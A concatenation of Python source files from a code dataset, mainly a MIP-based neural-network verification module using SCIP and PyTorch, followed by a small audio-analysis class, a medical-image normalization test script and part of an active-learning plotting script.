Futhermore, the input constraints are added\n to self.model and self.output_cons is filled.\"\"\"\n\n assert_or = False\n assert_and = False\n input_bounds = {}\n input_elements = []\n\n with open(self.filepath, \"r\") as f:\n for line in f:\n if line.startswith(\"#\"):\n continue\n elements = line.split()\n if elements[0] == \"Input\":\n input_bounds[elements[1]] = {\"lb\": None, \"ub\": None}\n self.graph.add_node(elements[1], node_type=\"input\")\n\n if elements[0] == \"ReLU\":\n\n relu_in_name = elements[1] + \"_in\"\n relu_out_name = elements[1]\n bias = float(elements[2])\n variables, coeffs = self.get_vars_and_coefficients(elements, str_only=True)\n\n relu_entry = namedtuple(\"ReLU\", [\"relu_in_name\", \"relu_out_name\", \"bias\", \"variables\", \"coeffs\"])\n self.relu_nodes[elements[1]] = relu_entry(relu_in_name, relu_out_name, bias, variables, coeffs)\n # relu_in node is created and added to self.relu_in_nodes later, other variables also created later\n\n self.graph.add_node(relu_in_name, node_type=\"relu_in\", bias=bias)\n self.graph.add_node(relu_out_name, node_type=\"relu_out\")\n self.graph.add_edge(relu_in_name, relu_out_name)\n for v, w in zip(variables, coeffs):\n self.graph.add_edge(v, relu_in_name, weight=w)\n\n\n if elements[0] == \"MaxPool\":\n\n self.max_pool_nodes[elements[1]] = elements[2:]\n self.graph.add_node(elements[1], node_type=\"max_pool\")\n self.graph.add_edges_from(((v, elements[1]) for v in elements[2:]), weight=1)\n\n\n if elements[0] == \"Linear\":\n variables, coeffs = self.get_vars_and_coefficients(elements, str_only=True)\n bias = float(elements[2])\n self.linear_nodes[elements[1]] = (bias, variables, coeffs)\n\n #self.graph.add_edges_from((v.name, linear.name) for v in variables)\n self.graph.add_node(elements[1], node_type=\"linear\", bias=bias)\n for v, w in zip(variables, coeffs):\n self.graph.add_edge(v, elements[1], weight=w)\n\n\n if elements[0] == \"Assert\":\n input_elements.append(elements)\n\n # explicit bounds for input neurons\n if len(elements) == 5 and elements[-1] in input_bounds:\n if elements[1] == \"<=\":\n new_lb = float(elements[2]) / float(elements[3])\n if input_bounds[elements[-1]][\"lb\"] is None or input_bounds[elements[-1]][\"lb\"] < new_lb:\n input_bounds[elements[-1]][\"lb\"] = new_lb\n\n elif elements[1] == \">=\":\n new_ub = float(elements[2]) / float(elements[3])\n if input_bounds[elements[-1]][\"ub\"] is None or input_bounds[elements[-1]][\"ub\"] > new_ub:\n input_bounds[elements[-1]][\"ub\"] = new_ub\n\n if elements[0] == \"AssertOut\":\n assert elements[1] in [\"<=\", \">=\"] and not assert_or\n assert_and = True\n cons = namedtuple(\"output_cons\", [\"lhs\", \"operator\", \"elements\"])\n self.output_cons.append(cons(float(elements[2]), True if elements[1] == \">=\" else False, elements))\n #print(\"assertout\", elements)\n\n if elements[0] == \"AssertOr\":\n # assertOr properties are basically the same as AND, just the \"imaginary\" operator is turned around\n # we assume that all subsequent ORs in the file form one disjunction\n assert elements[1] in [\"<=\", \">=\"] and not assert_and\n assert_or = True\n cons = namedtuple(\"output_cons\", [\"lhs\", \"operator\", \"elements\"])\n self.output_cons.append(cons(float(elements[2]), False if elements[1] == \">=\" else True, elements))\n\n for var_name, bounds in input_bounds.items():\n self.vars[var_name] = self.model.addVar(name=var_name, lb=bounds[\"lb\"], ub=bounds[\"ub\"])\n self.input_nodes[var_name] = self.vars[var_name]\n\n for assert_input_count, elements 
in enumerate(input_elements):\n if elements[1] == \"<=\":\n self.model.addCons(float(elements[2]) <= self.quicksum_coeff_var(elements),\n name=\"input_cons_\" + str(assert_input_count))\n elif elements[1] == \">=\":\n self.model.addCons(float(elements[2]) >= self.quicksum_coeff_var(elements),\n name=\"input_cons_\" + str(assert_input_count))\n else:\n raise NotImplementedError(\"This property cannot be verified: \" + elements[1])\n\n self.model.hideOutput()\n for var_name, bounds in input_bounds.items():\n if bounds[\"lb\"] is None:\n self.model.setObjective(self.vars[var_name])\n self.model.optimize()\n if self.model.getStatus() != \"optimal\":\n raise ValueError(\"LP lower bound of input cannot be solved to optimality\")\n else:\n bound = self.model.getDualbound()\n self.model.freeTransform()\n self.model.chgVarLbGlobal(self.vars[var_name], bound - 10 * self.eps)\n if bounds[\"ub\"] is None:\n self.model.setObjective(self.vars[var_name], sense=\"maximize\")\n self.model.optimize()\n if self.model.getStatus() != \"optimal\":\n raise ValueError(\"LP upper bound of input cannot be solved to optimality\")\n else:\n bound = self.model.getDualbound()\n self.model.freeTransform()\n self.model.chgVarUbGlobal(self.vars[var_name], bound + 10 * self.eps)\n\n self.model.setObjective(0.0)\n\n self.model.hideOutput(quiet=False)\n\n return self.model, self.vars\n\n\n def add_further_constraints(self, linear_model=False, optimize_nodes=False, opt_mode=False, use_symbolic=False,\n bfs_from_all_inputs=False):\n \"\"\"This methods adds all variables and also fills self.nodes_sorted\n\n Args:\n linear_model: bool, if True add only linear approximation constraints instead of \"real\" constraints\n optimize_nodes: bool, should nodes be optimized (implies solving MIPs/LPs depending on linear_model=False/True)\n opt_mode: bool, use the optimization mode of Bunel et al. or not?\n use_symbolic: bool, use the symbolic bound computation of Wang et al. 
?\n bfs_from_all_inputs: bool, should a Breadth first search be performed from all inputs rather than just one?\n This is needed, if some input neurons are not connected to all neurons in the\n next layer, or there are layers which are not fully connected\n \"\"\"\n\n self.bound_comp = BoundComp(self) # must be called after self.build_model() to have input nodes available\n\n if optimize_nodes:\n self.model.setRealParam(\"limits/time\", 3)\n self.model.hideOutput()\n\n self.nodes_sorted = list(nx.topological_sort(self.graph))\n\n if bfs_from_all_inputs: # this is required if not all neurons in the NN can be reached from every input neuron\n for input_node in self.input_nodes:\n for node, dist in bfs_dist(self.graph, input_node).items():\n if dist >= len(self.layers):\n self.layers.append(set())\n self.layers[dist].add(node)\n else:\n for node, dist in bfs_dist(self.graph, next(iter(self.input_nodes))).items():\n if dist >= len(self.layers):\n self.layers.append(set())\n self.layers[dist].add(node)\n self.layers[0].update(self.input_nodes)\n\n for i, s in enumerate(self.layers):\n self.layers[i] = sorted(s)\n\n num_fixed = 0\n for layer_index, layer_nodes in enumerate(self.layers):\n\n if use_symbolic:\n temp_values = self.bound_comp.update_symbolic_bounds(layer_nodes, use_approximation=True,\n compare_with_global=False)\n\n for node_name in layer_nodes:\n\n if node_name in self.relu_nodes:\n # this is filled in dnn_bound_prop, the dict will map node_number to the constraints\n self.relu_cons[node_name] = {}\n\n relu_in_name, relu_out_name, bias, variable_names, coeffs = self.relu_nodes[node_name]\n lb, ub = self.compute_linear_bounds(variable_names, coeffs)\n lb += bias\n ub += bias\n\n relu_out = self.model.addVar(name=relu_out_name) # output of ReLU with lb=0\n relu_in = self.model.addVar(name=relu_in_name, lb=lb, ub=ub)\n\n self.vars[node_name] = relu_out\n self.vars[node_name + \"_in\"] = relu_in\n self.relu_in_nodes[node_name + \"_in\"] = relu_in\n\n\n self.model.addCons(relu_in == bias + self.quicksum_from_var_names(variable_names, coeffs),\n name=node_name + \"_in\")\n\n if optimize_nodes and abs(ub) + abs(lb) < 200:\n self.model.setObjective(relu_in)\n self.model.optimize()\n stat = self.model.getStatus()\n new_lb = self.model.getDualbound()\n\n self.model.freeTransform()\n\n self.model.setObjective(relu_in, sense=\"maximize\")\n self.model.optimize()\n new_ub = self.model.getDualbound()\n\n self.model.freeTransform()\n\n\n\n elif use_symbolic:\n new_lb = max(lb, temp_values[node_name][0])\n new_ub = min(ub, temp_values[node_name][1])\n\n else:\n new_lb = lb\n new_ub = ub\n\n\n new_lb -= self.eps\n new_ub += self.eps\n\n self.model.tightenVarLbGlobal(relu_in, new_lb)\n self.model.tightenVarUbGlobal(relu_in, new_ub)\n\n # add the ReLU (approximation or binary) constraint for newly added node to the model\n if new_lb < 0 < new_ub:\n self.model.tightenVarUbGlobal(relu_out, new_ub)\n self.model.addCons(relu_out >= relu_in, name=node_name + \"_relu_lb\")\n\n if linear_model:\n factor = new_ub / (new_ub - new_lb)\n self.delete_cons.append(self.model.addCons(relu_out + new_lb * factor <= relu_in * factor,\n name=node_name + \"_lin_approx\"))\n else:\n\n d = self.model.addVar(ub=1, vtype=\"B\", name=\"bin_\" + node_name)\n self.binary_variables[\"bin_\" + node_name] = d\n c1 = self.model.addCons(relu_out <=\n relu_in - (1 - d) * (new_lb + self.eps), name=node_name + \"_bin_lb\")\n c2 = self.model.addCons(relu_out <= d * (new_ub + self.eps), name=node_name + \"_bin_ub\")\n\n elif new_ub <= 
0:\n num_fixed += 1\n self.model.fixVar(relu_out, 0)\n self.fixed_negative[node_name] = relu_out\n\n elif new_lb >= 0:\n num_fixed += 1\n self.model.addCons(relu_out == relu_in, name=node_name + \"_fix_pos\")\n self.model.tightenVarLbGlobal(relu_out, new_lb)\n self.model.tightenVarUbGlobal(relu_out, new_ub)\n self.fixed_positive[node_name] = relu_out\n\n elif node_name in self.linear_nodes:\n bias, variable_names, coeffs = self.linear_nodes[node_name]\n lb, ub = self.compute_linear_bounds(variable_names, coeffs)\n\n linear = self.model.addVar(name=node_name, lb=lb+bias, ub=ub+bias)\n self.model.addCons(linear == bias + self.quicksum_from_var_names(variable_names, coeffs),\n name=node_name + \"_linear\")\n self.vars[node_name] = linear\n\n elif node_name in self.max_pool_nodes:\n max_pool = self.model.addVar(name=node_name, lb=None)\n variables = [self.vars[var_name] for var_name in self.max_pool_nodes[node_name]]\n self.vars[node_name] = max_pool\n M = max(v.getUbGlobal() for v in variables)\n self.model.chgVarUbGlobal(max_pool, M)\n self.model.chgVarLbGlobal(max_pool, min(v.getLbGlobal() for v in variables))\n if linear_model:\n self.add_cons_maxpool_linear(variables, max_pool, [v.getLbGlobal() for v in variables], node_name)\n else:\n self.add_cons_maxpool(variables, max_pool, M, name=node_name)\n\n # end of current layer\n # here we assume that all ReLU layers contain only ReLU nodes\n\n print(num_fixed, \"variables fixed\")\n\n\n if optimize_nodes:\n self.model.setObjective(0.0)\n self.model.hideOutput(quiet=False)\n\n # currently AssertOr is only supported if opt_mode = True\n if not opt_mode:\n for lhs, operator, elements in self.output_cons:\n assert elements[0] == \"AssertOut\", \"AssertOr only supported in opt_mode\"\n if not operator:\n self.model.addCons(lhs <= self.quicksum_coeff_var(elements))\n else:\n self.model.addCons(lhs >= self.quicksum_coeff_var(elements))\n\n\n\n def _build_output_cons(self, lhs, operator, elements, name, opt_mode):\n \"\"\"Build an output constraint and add it to self.graph. 
Also added to the model if opt_mode is True.\n\n Args:\n lhs: float, left hand side of the constraint\n operator: bool, indicates the direction of the operator\n elements: list, elements as saved in self.output_cons\n name: str, name that constraint shall have\n opt_mode: bool, is opt_mode used?\n\n Returns:\n float, float -- the lower and upper bound of the constraint neuron (to be used if opt_mode == True)\n \"\"\"\n\n var_name = name\n variable_names, coeffs = self.get_vars_and_coefficients(elements, str_only=True)\n self.output_variables[var_name] = variable_names, coeffs, operator, lhs\n if opt_mode:\n out_var = self.model.addVar(var_name, lb=None, ub=None)\n self.vars[var_name] = out_var\n\n variables = [self.vars[v] for v in variable_names]\n lb, ub = self.compute_linear_bounds(variable_names, coeffs)\n\n if operator:\n if opt_mode:\n self.model.addCons(out_var == self.quicksum_coeff_var(elements) - lhs, name=var_name)\n self.model.chgVarUbGlobal(out_var, ub - lhs)\n self.model.chgVarLbGlobal(out_var, lb - lhs)\n ub_return = ub - lhs\n lb_return = lb - lhs\n self.graph.add_node(var_name, node_type=\"linear_opt\", bias=-lhs)\n for v, w in zip(variables, coeffs):\n self.graph.add_edge(v.name, var_name, weight=w)\n\n else:\n if opt_mode:\n self.model.addCons(out_var == lhs - self.quicksum_coeff_var(elements), name=var_name)\n self.model.chgVarUbGlobal(out_var, lhs - lb)\n self.model.chgVarLbGlobal(out_var, lhs - ub)\n ub_return = lhs - lb\n lb_return = lhs - ub\n # in this case we have to switch the sign of all coefficients\n self.graph.add_node(var_name, node_type=\"linear_opt\", bias=lhs)\n for v, w in zip(variables, coeffs):\n self.graph.add_edge(v.name, var_name, weight=-w)\n\n return lb_return, ub_return\n\n\n def add_optimize_constraints(self, opt_mode):\n \"\"\"We always need this function to build the pytorch model correctly. Only if opt_mode == True,\n the optimize cons are added to the SCIP model.\n Add constraints as in PLNN paper to model verification as optimization problem. Needs that the dict\n self.output_cons is filled correctly with all output constraints.\n\n Notice that in the rlv-Files the AssertOut lines are not the properties, but the inverse properties. In the\n PLNN paper, they talk about the actual (not inverse) properties. 
If the original properties are conjunctions,\n then the inverted properties are disjunctions.\n\n Args:\n opt_mode: bool, should the opt constraints be added to the SCIP model?\n \"\"\"\n\n upper_bounds = []\n lower_bounds = []\n\n for i, (lhs, operator, elements) in enumerate(self.output_cons):\n if elements[0] == \"AssertOr\":\n assert opt_mode, \"AssertOr only allowed in opt_mode\"\n self.verify_or_constraints = True\n lb, ub = self._build_output_cons(lhs, operator, elements, \"output_cons_or_\" + str(i), opt_mode)\n lower_bounds.append(lb)\n upper_bounds.append(ub)\n\n elif elements[0] == \"AssertOut\":\n lb, ub = self._build_output_cons(lhs, operator, elements, \"output_cons_\" + str(i), opt_mode)\n lower_bounds.append(lb)\n upper_bounds.append(ub)\n\n else:\n raise TypeError(\"Error with AssertOut and Or\")\n\n self.graph.add_node(\"t\", node_type=\"max_pool_opt\")\n self.graph.add_edges_from(((v, \"t\") for v in self.output_variables), weight=1)\n\n # add max pool \"node\" that enforces all output constraints\n if opt_mode:\n self.objective_variable = self.model.addVar(name=\"t\", lb=None)\n self.model.chgVarUbGlobal(self.objective_variable, max(upper_bounds))\n self.model.chgVarLbGlobal(self.objective_variable, max(lower_bounds))\n\n self.add_cons_maxpool([self.vars[v] for v in self.output_variables], self.objective_variable,\n max(upper_bounds), name=\"max_pool_opt\")\n\n # if we verify or constraints, we switch the optimization direction since there is a minus sign that\n # must be simulated\n self.model.setObjective(-self.objective_variable if self.verify_or_constraints else self.objective_variable)\n\n\n def add_binary_constraints(self, delete_cons=True):\n \"\"\"Add Relu and max pool constraints after using the function optimize_bounds_lp.\n relu_out >= relu_in constraints are not added in this function, and should therefore not\n be contained in self.delete_cons. Also adds the maxpool constraint for the optimization\n approach, if self.objective variable exists.\n\n Args:\n delete_cons: bool, if True, the linear approximation constraints are deleted,\n otherwise they remain in the problem formulation\n \"\"\"\n\n if delete_cons:\n for cons in self.delete_cons:\n self.model.delCons(cons)\n\n for node_name in self.nodes_sorted:\n\n if node_name in self.relu_nodes and \\\n node_name not in self.fixed_positive and node_name not in self.fixed_negative:\n relu_in, relu_out, bias, variable_names, coeffs = self.relu_nodes[node_name]\n relu_in = self.vars[relu_in]\n relu_out = self.vars[relu_out]\n\n lb = relu_in.getLbGlobal()\n ub = relu_in.getUbGlobal()\n d = self.model.addVar(ub=1, vtype=\"B\", name=\"bin_\" + node_name)\n self.binary_variables[\"bin_\" + node_name] = d\n c1 = self.model.addCons(relu_out <= relu_in - (1 - d) * (lb - self.eps), name=node_name + \"_bin_lb\")\n c2 = self.model.addCons(relu_out <= d * (ub + self.eps), name=node_name + \"_bin_ub\")\n #self.relu_cons[node_name] = c1, c2\n\n if lb >= 0:\n self.model.chgVarLbGlobal(self.binary_variables[\"bin_\" + node_name], 1)\n if ub <= 0:\n self.model.chgVarUbGlobal(self.binary_variables[\"bin_\" + node_name], 0)\n\n elif node_name in self.max_pool_nodes:\n variables = [self.vars[var] for var in self.max_pool_nodes[node_name]]\n\n M = max(v.getUbGlobal() for v in variables)\n self.add_cons_maxpool(variables, self.vars[node_name], M, name=node_name)\n\n\n\n def build_pytorch_model(self):\n \"\"\"Builds a neural net class for pytorch use. 
Can only be called after self.graph was created\n in add_further_constraints().\n \"\"\"\n\n layer_type_list = []\n for i, layer_nodes in enumerate(self.layers):\n\n layer_size = len(layer_nodes)\n layer_sample_node_type = self.graph.node[next(iter(layer_nodes))][\"node_type\"]\n if layer_sample_node_type in [\"linear\", \"relu_out\", \"max_pool\"]:\n layer_type_list.append((layer_sample_node_type, layer_size, i))\n for j, n in enumerate(layer_nodes):\n self.node_position_pytorch[n] = (len(layer_type_list) - 1, j)\n elif layer_sample_node_type in [\"relu_in\", \"input\"]:\n pass\n else:\n raise TypeError(\"Layer type not correct or not supported, was \" + layer_sample_node_type)\n\n class NNClass(torch.nn.Module):\n \"\"\"Class for the pytorch model.\n Args:\n num_inputs: int, number of input neurons\n\n \"\"\"\n def __init__(self, num_inputs, num_output_cons=None, opt_mode=False):\n \"\"\"\n Args:\n num_inputs: int, number of input neurons\n num_output_cons: int, number of output constraints, is only used in opt mode\n opt_mode: bool, should the pytorch network be constructed including the opt neurons\n \"\"\"\n\n super(NNClass, self).__init__()\n last_size = num_inputs\n self.opt_mode = opt_mode\n\n for i, (layer_type, layer_size, _) in enumerate(layer_type_list):\n if layer_type in [\"linear\", \"relu_out\"]:\n setattr(self, str(i) + \"_\" + layer_type, torch.nn.Linear(last_size, layer_size))\n elif layer_type == \"max_pool\":\n assert layer_size == 1, \"More than one max pool node per layer currently not supported, see TODO\"\n setattr(self, str(i) + \"_\" + layer_type, torch.nn.MaxPool1d(last_size)) # last_size = kernel_size\n else:\n raise TypeError(\"Wrong layer type.\")\n last_size = layer_size\n\n # we always add the \"optimization neurons\" to the pytorch model since these help to\n # find primal solutions using the heuristic\n assert num_output_cons > 0, \"Number of outputs must be given in order to use opt mode.\"\n setattr(self, str(len(layer_type_list)) + \"_linear_opt\", torch.nn.Linear(last_size, num_output_cons))\n setattr(self, str(len(layer_type_list) + 1) + \"_max_pool_opt\", torch.nn.MaxPool1d(num_output_cons))\n\n def forward(self, x):\n\n for i, (layer_type, layer_size, _) in enumerate(layer_type_list):\n if layer_type == \"max_pool\":\n x = x.view(1, 1, -1)\n x = getattr(self, str(i) + \"_\" + layer_type)(x)\n if layer_type == \"relu_out\":\n x = torch.nn.functional.relu(x)\n\n # we always add the \"optimization neurons\" to the pytorch model since these help to\n # find primal solutions using the heuristic\n x = getattr(self, str(len(layer_type_list)) + \"_linear_opt\")(x)\n x = x.view(1, 1, -1)\n x = getattr(self, str(len(layer_type_list) + 1) + \"_max_pool_opt\")(x)\n return x\n\n self.pytorch_model = NNClass(len(self.input_nodes), len(self.output_variables), True)\n\n print(self.pytorch_model.state_dict().keys())\n state_dict = OrderedDict()\n\n # here we only support neuron predecessors from the layer immediately before\n # would require some substantial changes to the pytorch access to change this\n for torch_index, (layer_type, layer_size, orig_index) in enumerate(layer_type_list):\n if layer_type == \"max_pool\":\n continue # for max pool layers we don't have to create a pytorch tensor\n layer_weights = []\n layer_biases = []\n for el in self.layers[orig_index]: # + 1 to skip input layer\n pred_weights = []\n if layer_type == \"relu_out\":\n predecessors = set(self.graph.predecessors(el + \"_in\"))\n for possible_pred in self.layers[orig_index - 2]: # skip 
the relu_in layer\n if possible_pred in predecessors:\n predecessors.remove(possible_pred)\n pred_weights.append(self.graph.edges[possible_pred, el + \"_in\"][\"weight\"])\n else:\n pred_weights.append(0)\n layer_biases.append(self.graph.node[el + \"_in\"][\"bias\"])\n\n\n elif layer_type == \"linear\":\n predecessors = set(self.graph.predecessors(el))\n for possible_pred in self.layers[orig_index - 1]:\n if possible_pred in predecessors:\n predecessors.remove(possible_pred)\n pred_weights.append(self.graph.edges[possible_pred, el][\"weight\"])\n else:\n pred_weights.append(0)\n layer_biases.append(self.graph.node[el][\"bias\"])\n\n layer_weights.append(pred_weights)\n assert len(predecessors) == 0, \"set of predecessors not empty, i.e. predecessor from previous layer\"\n\n state_dict[str(torch_index) + \"_\" + layer_type + \".weight\"] = torch.FloatTensor(layer_weights)\n state_dict[str(torch_index) + \"_\" + layer_type + \".bias\"] = torch.FloatTensor(layer_biases)\n\n if True: # use_opt_mode\n layer_weights = []\n layer_biases = []\n for el in self.output_variables:\n pred_weights = []\n predecessors = set(self.graph.predecessors(el))\n for possible_pred in self.layers[-1]: # works only with constraints on output variables,\n # not on other variables\n if possible_pred in predecessors:\n predecessors.remove(possible_pred)\n pred_weights.append(self.graph.edges[possible_pred, el][\"weight\"])\n else:\n pred_weights.append(0)\n layer_biases.append(self.graph.node[el][\"bias\"])\n layer_weights.append(pred_weights)\n\n state_dict[str(len(layer_type_list)) + \"_linear_opt.weight\"] = torch.FloatTensor(layer_weights)\n state_dict[str(len(layer_type_list)) + \"_linear_opt.bias\"] = torch.FloatTensor(layer_biases)\n\n self.pytorch_model.load_state_dict(state_dict)\n self.pytorch_model.eval()\n\n\n def add_relu_branching(self, **kwargs):\n self.model.includeBranchrule(ReluBranching(self),\n \"relu_branch_rule\", \"branch on ReLU nodes\", **kwargs)\n\n def add_domain_branching(self, opt_mode, split_mode, **kwargs):\n self.model.includeBranchrule(DomainBranching(self, opt_mode, split_mode),\n \"domain_branch_rule\", \"branch input domains\", **kwargs)\n\n def add_sampling_heuristic(self, freq, maxdepth, **kwargs):\n self.model.includeHeur(SamplingHeuristic(self, **kwargs),\n \"sampling_heuristic\", \"try random solutions\", \"s\", freq=freq, maxdepth=maxdepth)\n\n def add_sampling_heuristic_local(self, freq, maxdepth, **kwargs):\n self.model.includeHeur(SamplingHeuristic(self, use_local_bounds=True, **kwargs),\n \"sampling_heuristic_local\", \"try random locally\", \"l\",\n priority=100000, freq=freq, maxdepth=maxdepth)\n\n def add_relu_sepa(self, priority=10, freq=1, maxbounddist=1.0, delay=False):\n self.model.includeSepa(ReluSepa(self), \"relu_sepa\", \"ideal separation\", priority=priority, freq=freq,\n maxbounddist=maxbounddist, delay=delay)\n\n def add_dnn_bound_prop(self, opt_mode, optimize_nodes, obbt_2, use_symbolic, bound_for_opt, maxdepth, use_genvbounds, **kwargs):\n if opt_mode:\n from dnn_bound_prop_opt import DNNBoundProp\n else:\n from dnn_bound_prop_nonopt import DNNBoundProp\n prop = DNNBoundProp(self, optimize_nodes, obbt_2, use_symbolic, bound_for_opt, maxdepth, use_genvbounds, **kwargs)\n self.model.includeProp(prop,\n \"use lp approximation\", \"bound tightening for domain branching\",\n presolpriority=1000,\n presolmaxrounds=0, proptiming=SCIP_PROPTIMING.AFTERLPLOOP,\n priority=9999999, freq=1, delay=True,\n presoltiming=SCIP_PRESOLTIMING.EXHAUSTIVE)\n return prop\n\n def 
add_eventhdlr_debug(self):\n \"\"\"Detect bound change events for debugging purposes.\n Put the variable in question as parameter to .getTransformedVar. SCIP_EVENTTYPE can be set to\n UBTIGHTENED or LBTIGHTENED\"\"\"\n self.debug_bound_hdlr = LbChangeEvent()\n self.model.includeEventhdlr(self.debug_bound_hdlr, \"ub change\", \"t\")\n\n\n def add_eventhdlr_dualbound(self):\n self.dualbound_hdlr_feas = DualBoundEvent(self)\n self.model.includeEventhdlr(self.dualbound_hdlr_feas, \"dualbound_feas\", \"check dualbound value\")\n self.dualbound_hdlr_infeas = DualBoundEvent(self)\n self.model.includeEventhdlr(self.dualbound_hdlr_infeas, \"dualbound_infeas\", \"check dualbound value\")\n\n def catch_events(self):\n \"\"\"Must be called to activate event handlers. Not necessary for eventhdlr_debug.\"\"\"\n if self.dualbound_hdlr_feas is not None and self.dualbound_hdlr_infeas is not None:\n self.model.catchEvent(SCIP_EVENTTYPE.NODEINFEASIBLE, self.dualbound_hdlr_infeas)\n self.model.catchEvent(SCIP_EVENTTYPE.NODEFEASIBLE, self.dualbound_hdlr_feas)\n print(\"caught event handler dualbound\")\n if self.local_search_hdlr is not None:\n self.model.catchEvent(SCIP_EVENTTYPE.BESTSOLFOUND, self.local_search_hdlr)\n print(\"caught \")\n if self.debug_bound_hdlr is not None:\n self.model.catchVarEvent(self.model.getTransformedVar(self.vars[\"relu_1X30\"]),\n SCIP_EVENTTYPE.UBTIGHTENED, self.debug_bound_hdlr)\n\n\n \n\n\n","sub_path":"src/model_boundd.py","file_name":"model_boundd.py","file_ext":"py","file_size_in_byte":39131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498005360","text":"\nfrom scipy.io import wavfile\n \nclass AudioAnalysis(object):\n \n PEAK_VALUE_THRESHOLD = 0.5\n PEAK_COUNT_THRESHOLD = 1000\n \n def is_rich(self, wave_file):\n \n # read voice file\n rate, data = wavfile.read(wave_file)\n data = data / (2.**15)\n \n # get number of peaks\n peaks = 0\n for val in data:\n if val > self.PEAK_VALUE_THRESHOLD:\n peaks += 1\n \n # return True if sound is rich (i.e. 
many peaks)\n if peaks > self.PEAK_COUNT_THRESHOLD:\n return True\n \n # otherwise return False\n return False\n","sub_path":"PyAudio/Research/AudioAnalyser/AudioAnalysis.py","file_name":"AudioAnalysis.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"246262100","text":"from unet3d.normalize import perform_clahe\nimport nibabel as nib\nfrom unet3d.normalize import normalize_volume\nfrom unet3d.utils.utils import save_nib\n\n\nfrom unet3d.utils.path_utils import get_workspace_path\n\nis_desktop = False\n\nsave_dir = get_workspace_path(is_desktop)\n\ntemp_volume_path = save_dir + \"volume.nii.gz\"\ntemp_template_path = save_dir + \"template.nii.gz\"\ntemp_volume_norm01_path = save_dir + \"norm01.nii.gz\"\ntemp_volume_normz_path = save_dir + \"normz.nii.gz\"\ntemp_volume_norm01_hist_path = save_dir + \"norm01_hist.nii.gz\"\ntemp_volume_normz_hist_path = save_dir + \"normz_hist.nii.gz\"\ntemp_volume_clahe_path = save_dir + \"volume_clahe.nii.gz\"\n\nvolume = nib.load(temp_volume_path)\nvolume = volume.get_data()\ntemplate = nib.load(temp_template_path)\n\naffine = template.affine\ntemplate = template.get_data()\n# save_nib(volume, temp_volume_path, affine)\n\n\nvolume_norm01 = normalize_volume(volume, template,\n is_normalize=\"01\",\n is_hist_match=\"0\")\nsave_nib(volume_norm01, temp_volume_norm01_path, affine)\n\n\nvolume_normz = normalize_volume(volume, template,\n is_normalize=\"z\",\n is_hist_match=\"0\")\nsave_nib(volume_normz, temp_volume_normz_path, affine)\n\n\nvolume_norm01_hist = normalize_volume(volume, template,\n is_normalize=\"01\",\n is_hist_match=\"1\")\nsave_nib(volume_norm01_hist, temp_volume_norm01_hist_path, affine)\n\n\nvolume_normz_hist = normalize_volume(volume, template,\n is_normalize=\"z\",\n is_hist_match=\"1\")\nsave_nib(volume_normz_hist, temp_volume_normz_hist_path, affine)\n\n\n# import numpy as np\n# source = volume\n\n# # reshape to 1d\n# H, W, D = source.shape\n# source_2d = source.reshape((H, W*D))\n\n\n# volume_clahe = perform_clahe(source_2d, clip_limit=0.002)\n# volume_clahe = volume_clahe.reshape(source.shape)\n# save_nib(volume_clahe, temp_volume_clahe_path, affine)\n\n\n# save_nib(template, temp_template_path, affine)\n# save_nib(volume_normalized, temp_volume_norm_path, affine)\n# save_nib(volume_normalized-volume, temp_diff_path, affine)\n","sub_path":"tests/test_norm.py","file_name":"test_norm.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"7339907","text":"\nimport argparse, shelve, os\nfrom argparse import Namespace\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom .train_scheduler import TrainScheduler\nfrom .utils import load_optimal, load_baseline\nfrom . 
import help_text as ht\n\ndef abs_path(p):\n return os.path.join(os.path.dirname(__file__), p)\n\ndef plot_curves(order, xs, evaluation_set, search_model_seed, eval_model_seed, data_seed,\n batchsize, max_epoch, patience, tot_acq, use_gpus, workers_per_gpu, baselines):\n legends = []\n spec = f'{search_model_seed} {eval_model_seed} {data_seed} {batchsize} {max_epoch} {patience} {tot_acq}'\n with shelve.open(abs_path('statistics/perf_curves.shv')) as curves:\n if spec in curves and curves[spec]['order'] == order:\n optimal_curve = curves[spec][evaluation_set]\n else:\n eval_args = Namespace(model_seed=eval_model_seed, data_seed=data_seed, batchsize=batchsize,\n max_epoch=max_epoch, patience=patience, evaluation_set=evaluation_set,\n tot_acq=tot_acq, use_gpus=use_gpus, workers_per_gpu=workers_per_gpu)\n scheduler = TrainScheduler(eval_args)\n optimal_curve = scheduler.evaluate_order(order)\n plt.plot(xs, optimal_curve, 'C3-o')\n legends.append(f'Optimal: {np.mean(optimal_curve):0.3f}')\n for name, display_name, color in baselines:\n try:\n curve = load_baseline(name, evaluation_set, eval_model_seed, data_seed,\n batchsize, max_epoch, patience, tot_acq)['curve']\n plt.plot(xs, curve, f'C{color}-o')\n legends.append(f'{display_name}: {np.mean(curve):0.3f}')\n except:\n print(f'{display_name} not found')\n plt.legend(legends)\n return optimal_curve\n\ndef main(search_model_seed=0, eval_model_seed=None, data_seed=0, tot_acq=250, batchsize=25, max_epoch=100, patience=20,\n use_gpus='all', workers_per_gpu=1, log_dir='logs'):\n if eval_model_seed is None:\n eval_model_seed = search_model_seed\n\n N_warmstart = 50\n optimal_order, optimal_quality, _ = load_optimal(log_dir, search_model_seed, data_seed,\n batchsize, max_epoch, patience, tot_acq)\n print(f'optimal quality in log: {optimal_quality}')\n\n plt.figure(figsize=[7.5, 4])\n xs = list(range(N_warmstart, N_warmstart + tot_acq + 1, batchsize))\n baselines = [('min-confidence', 'Min-Confidence', 0), ('normalized-min-confidence', 'Norm.-Min-Conf.', 1),\n ('longest', 'Longest', 2), ('random', 'Random', 4)]\n plot_args = [search_model_seed, eval_model_seed, data_seed, batchsize, max_epoch, patience,\n tot_acq, use_gpus, workers_per_gpu, baselines]\n\n plt.subplot(1, 2, 1)\n valid_curve = plot_curves(optimal_order, xs, 'valid', *plot_args)\n xmin1, xmax1, ymin1, ymax1 = plt.axis()\n plt.xticks(np.linspace(N_warmstart, tot_acq + N_warmstart, 6))\n plt.xlabel('# Data Points')\n plt.ylabel('F1')\n plt.title('Validation Set $\\\\mathcal{D}^V$')\n ax1 = plt.gca()\n\n plt.subplot(1, 2, 2)\n test_curve = plot_curves(optimal_order, xs, 'test', *plot_args)\n xmin2, xmax2, ymin2, ymax2 = plt.axis()\n 